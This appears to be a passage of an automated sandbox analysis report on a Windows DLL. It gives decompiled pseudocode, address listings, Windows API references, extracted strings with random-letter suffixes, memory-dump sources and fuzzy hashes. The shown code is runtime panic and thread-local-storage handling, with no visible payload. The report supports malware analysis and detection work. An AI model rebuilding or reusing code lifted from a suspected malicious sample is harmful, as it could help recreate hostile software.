				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6F243B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6f28adc0], esi");
				_t190 = E6F23D1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6F256EE0(_t264,  &M6F27D0E7, 0x46, _t337,  &_v68, 0x6f27d060, 0x6f27d1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6f27cd60;
						_v120 = 0x6f27d014;
						_v68 = 0x6f27da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6F232640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6F23D2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6f28adc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6f28adc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6f27da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6f27cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6F23D2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6f28adbc);
					_v144 = 0x6f28adbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6F23D1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6f28adb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6F23D530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6F256EE0(_t264,  &M6F27D0E7, 0x46, _t340,  &_v68, 0x6f27d060, 0x6f27d1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6f28a044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6f28a044;
							_t202 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6f28a044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6f28a044;
								_t203 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6f28adc8; // 0x1310000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6f28a044;
										_t332 = _t205;
										_t206 =  *0x6f28a044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6F256C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6f28adc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6f28adb0;
											 *0x6f28adb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6f243440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6f28adc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6F23C800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6F256EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6f27d050, 0x6f27d720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6F23C690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6F23C800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6f27d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6f23de50;
										_v60 =  &_v100;
										_v56 = 0x6f23de50;
										_v52 =  &_v148;
										_v48 = E6F23DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6F23D2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t245);
											}
											HeapFree( *0x6f28adc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6f28adac);
											_v68 = 0x6f27d2c0;
											_v64 = 1;
											_v152 = 0x6f28adac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6F23DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6F23D2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6f28adac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6F23C800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6F23DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6f28adbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6f27da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6f27cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6F23D2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6F23D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6F23D440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6f28a040 = 0;
											_t356 =  *0x6f28a040;
											if( *0x6f28a040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6f27d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6f27cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6F23D2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t235);
											}
											HeapFree( *0x6f28adc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6f23c8cc
                          0x6f23c8cf
                          0x6f23c8d6
                          0x6f23c8dd
                          0x6f23c8e2
                          0x6f23c8e7
                          0x6f23c8f0
                          0x6f23c8f3
                          0x6f23c8f9
                          0x6f23c901
                          0x6f23c906
                          0x6f23c908
                          0x6f23c922
                          0x6f23c927
                          0x6f23c92a
                          0x6f23c92a
                          0x6f23c92e
                          0x6f23c931
                          0x6f23c934
                          0x6f23c936
                          0x6f23c9aa
                          0x6f23c9ad
                          0x6f23ca0a
                          0x6f23ca11
                          0x6f23ca1b
                          0x6f23ca22
                          0x6f23ca29
                          0x6f23ca2d
                          0x6f23ca34
                          0x6f23ca3b
                          0x6f23ca41
                          0x6f23ca44
                          0x6f23ca47
                          0x6f23ca4d
                          0x6f23ca54
                          0x6f23ca57
                          0x6f23ca5e
                          0x6f23ca63
                          0x6f23ca65
                          0x6f23ca6c
                          0x6f23ca74
                          0x6f23ca77
                          0x6f23ca79
                          0x6f23ca7c
                          0x6f23ca7c
                          0x6f23ca7f
                          0x6f23ca82
                          0x6f23ca86
                          0x6f23ca88
                          0x6f23ca8a
                          0x6f23ca8e
                          0x6f23ca90
                          0x6f23ca90
                          0x6f23ca9c
                          0x6f23ca9c
                          0x6f23caaa
                          0x6f23caaa
                          0x00000000
                          0x6f23ca65
                          0x6f23c9b2
                          0x6f23c9b5
                          0x6f23c9bc
                          0x6f23c9c3
                          0x6f23c9ca
                          0x6f23c9d1
                          0x6f23c9d5
                          0x6f23c9dc
                          0x6f23c9e3
                          0x6f23c9e8
                          0x6f23c9ea
                          0x00000000
                          0x6f23c9f0
                          0x6f23c9f5
                          0x6f23c9fd
                          0x6f23ca00
                          0x6f23ca02
                          0x00000000
                          0x6f23ca02
                          0x6f23c93d
                          0x6f23c93d
                          0x6f23c945
                          0x6f23c94b
                          0x6f23c955
                          0x6f23c95c
                          0x6f23c963
                          0x6f23c969
                          0x6f23c96c
                          0x6f23c96f
                          0x6f23c972
                          0x6f23c975
                          0x6f23c97a
                          0x6f23c97d
                          0x6f23c97f
                          0x6f23cab3
                          0x6f23cab3
                          0x6f23cab6
                          0x6f23cab8
                          0x6f23cb8b
                          0x6f23cb90
                          0x6f23cb93
                          0x6f23cb96
                          0x6f23cd97
                          0x00000000
                          0x6f23cd97
                          0x6f23cb9c
                          0x6f23cb9f
                          0x6f23cd90
                          0x00000000
                          0x6f23cd90
                          0x6f23cba5
                          0x6f23cba7
                          0x00000000
                          0x00000000
                          0x6f23cbb0
                          0x6f23cbb5
                          0x6f23cbb8
                          0x6f23cbbb
                          0x6f23cbbd
                          0x00000000
                          0x00000000
                          0x6f23cbc3
                          0x00000000
                          0x6f23cbc3
                          0x6f23cabe
                          0x00000000
                          0x6f23c985
                          0x6f23c99d
                          0x6f23c9a2
                          0x6f23cdbe
                          0x6f23cdbe
                          0x6f23cdc0
                          0x6f23cdc0
                          0x6f23cdc5
                          0x6f23caf3
                          0x6f23caf3
                          0x6f23caf6
                          0x6f23caf9
                          0x6f23cb00
                          0x6f23cb02
                          0x6f23cb07
                          0x6f23cb07
                          0x6f23cb0d
                          0x6f23cb16
                          0x6f23cbf3
                          0x6f23cbf3
                          0x6f23cbf8
                          0x6f23cbfa
                          0x6f23cbfc
                          0x6f23cc01
                          0x6f23cc01
                          0x6f23cc07
                          0x6f23cc0d
                          0x6f23cc0f
                          0x6f23cdcf
                          0x6f23cdd4
                          0x6f23cdd6
                          0x6f23cde6
                          0x6f23cdeb
                          0x6f23cdf0
                          0x6f23cdf2
                          0x6f23ce32
                          0x6f23ce38
                          0x6f23ce3f
                          0x6f23ce41
                          0x6f23ce46
                          0x6f23ce48
                          0x6f23ce4f
                          0x6f23ce52
                          0x6f23ce57
                          0x6f23ce57
                          0x6f23ce5c
                          0x00000000
                          0x6f23ce5c
                          0x6f23cdf4
                          0x6f23cdfe
                          0x6f23ce03
                          0x6f23ce05
                          0x6f23ce05
                          0x6f23ce08
                          0x6f23ce0b
                          0x6f23ce0e
                          0x6f23ceb8
                          0x6f23cebe
                          0x6f23cec9
                          0x6f23cec9
                          0x6f23cece
                          0x6f23cece
                          0x6f23ced0
                          0x6f23ced0
                          0x6f23ced2
                          0x6f23cedd
                          0x6f23cedd
                          0x6f23cee2
                          0x6f23cee2
                          0x6f23ceed
                          0x6f23cef5
                          0x6f23cef8
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cac1
                          0x6f23cac1
                          0x6f23cac7
                          0x6f23caca
                          0x6f23caca
                          0x6f23cad0
                          0x6f23cad3
                          0x6f23cad5
                          0x6f23cae3
                          0x6f23cae3
                          0x6f23cae5
                          0x6f23cbcd
                          0x6f23cbd0
                          0x6f23cbde
                          0x6f23cbe0
                          0x00000000
                          0x00000000
                          0x6f23cbe6
                          0x6f23cbe9
                          0x6f23cbeb
                          0x00000000
                          0x6f23cbeb
                          0x6f23caeb
                          0x6f23caee
                          0x6f23caf0
                          0x00000000
                          0x6f23caf0
                          0x6f23cec0
                          0x6f23cec2
                          0x00000000
                          0x6f23cec2
                          0x6f23ce14
                          0x6f23ce17
                          0x00000000
                          0x00000000
                          0x6f23ce1d
                          0x6f23ce20
                          0x00000000
                          0x00000000
                          0x6f23ce26
                          0x6f23ce28
                          0x00000000
                          0x6f23ce28
                          0x6f23cdd8
                          0x6f23cddd
                          0x6f23cddf
                          0x00000000
                          0x00000000
                          0x6f23cde1
                          0x00000000
                          0x6f23cc15
                          0x6f23cc15
                          0x6f23cc17
                          0x6f23cc1a
                          0x6f23ce62
                          0x6f23ce62
                          0x6f23ce65
                          0x6f23ce68
                          0x6f23ce68
                          0x6f23ce6b
                          0x6f23ce71
                          0x6f23ce78
                          0x6f23ce7f
                          0x6f23ce85
                          0x6f23ce87
                          0x6f23ce8d
                          0x6f23ce90
                          0x6f23ce96
                          0x6f23ce96
                          0x6f23ce90
                          0x6f23ce87
                          0x00000000
                          0x6f23ce7f
                          0x6f23cc20
                          0x6f23cc27
                          0x6f23cc2e
                          0x6f23cc2e
                          0x00000000
                          0x6f23cc2e
                          0x6f23cb1c
                          0x6f23cb1f
                          0x6f23cb21
                          0x00000000
                          0x00000000
                          0x6f23cb27
                          0x6f23cb2a
                          0x6f23cb2d
                          0x6f23cdb6
                          0x6f23cdbb
                          0x00000000
                          0x6f23cdbb
                          0x6f23cb33
                          0x6f23cb39
                          0x6f23cb3e
                          0x6f23cb40
                          0x6f23cb43
                          0x6f23cb4a
                          0x6f23cb4f
                          0x6f23cb52
                          0x6f23cb54
                          0x6f23cb57
                          0x6f23cb59
                          0x6f23cb5b
                          0x6f23cb5e
                          0x6f23cb60
                          0x6f23cb63
                          0x6f23cb63
                          0x6f23cb5e
                          0x6f23cb68
                          0x6f23cb68
                          0x6f23cb6b
                          0x6f23cb6e
                          0x6f23caaf
                          0x6f23caaf
                          0x6f23cab1
                          0x00000000
                          0x6f23cb74
                          0x6f23cb74
                          0x6f23cb78
                          0x6f23cb7b
                          0x6f23cb7e
                          0x6f23cea0
                          0x6f23cea6
                          0x6f23cea8
                          0x6f23ceab
                          0x6f23d062
                          0x6f23d062
                          0x6f23d067
                          0x6f23d068
                          0x6f23d068
                          0x6f23cc30
                          0x6f23cc37
                          0x6f23cc3e
                          0x6f23cc45
                          0x6f23cc4c
                          0x6f23cc50
                          0x6f23cc57
                          0x6f23cc5e
                          0x6f23cc65
                          0x6f23cc6d
                          0x6f23cc70
                          0x6f23cc76
                          0x6f23cc79
                          0x6f23cc7f
                          0x6f23cc85
                          0x6f23cc8c
                          0x6f23cc95
                          0x6f23cc9c
                          0x6f23cca2
                          0x6f23cca9
                          0x6f23ccac
                          0x6f23ccba
                          0x6f23ccc1
                          0x6f23ccc9
                          0x6f23cccc
                          0x6f23ccce
                          0x6f23ccd1
                          0x6f23ccd4
                          0x6f23ccdb
                          0x6f23ccdd
                          0x6f23cce3
                          0x6f23cce5
                          0x6f23cce5
                          0x6f23ccf1
                          0x6f23ccf1
                          0x6f23ccff
                          0x6f23ccff
                          0x6f23cd04
                          0x6f23cd15
                          0x6f23cd1a
                          0x6f23cf0b
                          0x6f23cf1a
                          0x6f23cf21
                          0x6f23cf28
                          0x6f23cf32
                          0x6f23cf35
                          0x6f23cf3c
                          0x6f23cf43
                          0x6f23cf49
                          0x6f23cf50
                          0x6f23cf53
                          0x6f23cf5a
                          0x6f23cf5f
                          0x6f23cf68
                          0x6f23cf6e
                          0x6f23cf71
                          0x00000000
                          0x00000000
                          0x6f23cf78
                          0x6f23cf80
                          0x6f23cf83
                          0x6f23cf85
                          0x00000000
                          0x6f23cd20
                          0x6f23cd23
                          0x6f23cfc0
                          0x6f23cfc3
                          0x6f23cfc5
                          0x6f23cfc7
                          0x6f23cfca
                          0x6f23cfcf
                          0x6f23cfcf
                          0x6f23cfca
                          0x6f23cfd7
                          0x6f23cfdd
                          0x6f23cfe3
                          0x6f23cfe5
                          0x6f23cfe7
                          0x6f23cfea
                          0x6f23cfef
                          0x6f23cfef
                          0x6f23cfea
                          0x6f23cff9
                          0x6f23cfff
                          0x6f23d003
                          0x6f23d00a
                          0x6f23d012
                          0x6f23d019
                          0x6f23d020
                          0x6f23d027
                          0x6f23d02e
                          0x6f23d032
                          0x6f23d039
                          0x6f23d040
                          0x6f23d048
                          0x6f23d04b
                          0x6f23d04e
                          0x6f23d053
                          0x6f23d055
                          0x6f23d055
                          0x6f23d057
                          0x6f23d05b
                          0x6f23d060
                          0x00000000
                          0x6f23d060
                          0x6f23cd2b
                          0x6f23cd31
                          0x6f23cd33
                          0x00000000
                          0x00000000
                          0x6f23cd3c
                          0x6f23cd3f
                          0x6f23cd46
                          0x6f23cd4d
                          0x6f23cd54
                          0x6f23cd5b
                          0x6f23cd62
                          0x6f23cd70
                          0x00000000
                          0x00000000
                          0x6f23cd7b
                          0x6f23cd7e
                          0x6f23cd86
                          0x6f23cd88
                          0x6f23cf88
                          0x6f23cf8b
                          0x6f23cf92
                          0x6f23cf9b
                          0x6f23cf9d
                          0x6f23cf9f
                          0x6f23cf9f
                          0x6f23cfab
                          0x6f23cfab
                          0x6f23cfbb
                          0x00000000
                          0x6f23cfbb
                          0x6f23cd1a
                          0x6f23ceb1
                          0x00000000
                          0x6f23ceb1
                          0x6f23cb84
                          0x00000000
                          0x6f23cb84
                          0x6f23cb6e
                          0x6f23cb16
                          0x6f23c97f

                          APIs
                            • Part of subcall function 6F23D1B0: TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1BB
                            • Part of subcall function 6F23D1B0: TlsGetValue.KERNEL32(00000000), ref: 6F23D1F3
                          • AcquireSRWLockShared.KERNEL32(6F28ADBC), ref: 6F23C945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CCFF
                          • GetProcessHeap.KERNEL32 ref: 6F23CDD8
                          • HeapAlloc.KERNEL32(01310000,00000000,00000010), ref: 6F23CDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,01310000,00000000,00000010), ref: 6F23CE5C
                          • HeapFree.KERNEL32(00000000,00000000,01310000,00000000,00000010), ref: 6F23CEDD
                          Strings
                          • full, xrefs: 6F23CEB8
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6F23CDC0
                          • Y3$o, xrefs: 6F23C8C5
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6F23C90D, 6F23C988
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6F23CDA1
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3$o$already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-1687021739
                          • Opcode ID: 70c092d4269e285d76a3ea58a3d54cad1617f8229c2183cd12a8f661ad497dee
                          • Instruction ID: 505fde60a4e2d224beab940dbddfe3b9a6026b3fada5f097a387f1917306eefd
                          • Opcode Fuzzy Hash: 70c092d4269e285d76a3ea58a3d54cad1617f8229c2183cd12a8f661ad497dee
                          • Instruction Fuzzy Hash: 7F1235F2E4022E9BEB14CFA4C894B9EBBF2FF45715F10811AD415AB280DB75A855CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C890, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F23C890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void* _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6F243B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6f27d9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6f28adc0], esi");
				_t193 = E6F23D1B0(_t268, 0x6f27d9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6F256EE0(_t268,  &M6F27D0E7, 0x46, _t349,  &_v68, 0x6f27d060, 0x6f27d1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
